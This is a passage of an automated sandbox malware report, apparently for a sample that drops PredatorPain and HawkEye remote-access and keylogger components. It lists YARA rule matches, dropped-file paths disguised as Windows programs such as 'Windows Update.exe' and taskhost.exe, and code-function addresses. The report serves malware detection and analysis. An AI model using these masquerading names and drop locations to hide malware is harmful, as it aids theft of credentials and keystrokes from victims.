                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPEDMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPEDMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_0040686C1_2_0040686C
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004060951_2_00406095
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004046B81_2_004046B8
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_00007FFAEE5E3DDC4_2_00007FFAEE5E3DDC
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009CD4265_2_009CD426
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009DD5AE5_2_009DD5AE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009CD5235_2_009CD523
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009CD6C45_2_009CD6C4
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009D76465_2_009D7646
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A029BE5_2_00A029BE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A06AF45_2_00A06AF4
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A2ABFC5_2_00A2ABFC
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A23CBE5_2_00A23CBE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A23C4D5_2_00A23C4D
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A23DC05_2_00A23DC0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A23D2F5_2_00A23D2F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009CED035_2_009CED03
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009CCF925_2_009CCF92
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009DAFA65_2_009DAFA6
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05208D685_2_05208D68
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052057585_2_05205758
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052060485_2_05206048
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052070985_2_05207098
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052057535_2_05205753
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05208D5F5_2_05208D5F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05201D985_2_05201D98
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052070935_2_05207093
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_009FC7BC5_2_009FC7BC
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006FF0FC7_2_006FF0FC
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006DC1627_2_006DC162
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006DC25F7_2_006DC25F
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006EC2EA7_2_006EC2EA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006E63827_2_006E6382
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006DC4007_2_006DC400
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_007116FA7_2_007116FA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_007158307_2_00715830
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_007399387_2_00739938
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_007329FA7_2_007329FA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_007329897_2_00732989
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_00732A6B7_2_00732A6B
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006DDA3F7_2_006DDA3F
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_00732AFC7_2_00732AFC
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006E9CE27_2_006E9CE2
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006DBCCE7_2_006DBCCE
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_0070B4F87_2_0070B4F8
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_02950D587_2_02950D58
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003FF0FC8_2_003FF0FC
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003DC1628_2_003DC162
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003DC25F8_2_003DC25F
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003EC2EA8_2_003EC2EA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003E63828_2_003E6382
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003DC4008_2_003DC400
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_004116FA8_2_004116FA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_004158308_2_00415830
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_004399388_2_00439938
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_004329FA8_2_004329FA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_004329898_2_00432989
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003DDA3F8_2_003DDA3F
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_00432A6B8_2_00432A6B
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_00432AFC8_2_00432AFC
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003E9CE28_2_003E9CE2
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_003DBCCE8_2_003DBCCE
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04D644708_2_04D64470
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_0040B4F88_2_0040B4F8
                    Source: MULTIBOT_NEWW.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: taskhost.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: taskhost.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: taskhost.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: iExplorer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Windows Update.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: security.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: security.dll
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: security.dll
                    Source: aaVb1xEmrd.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.taskhost.exe.311411c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
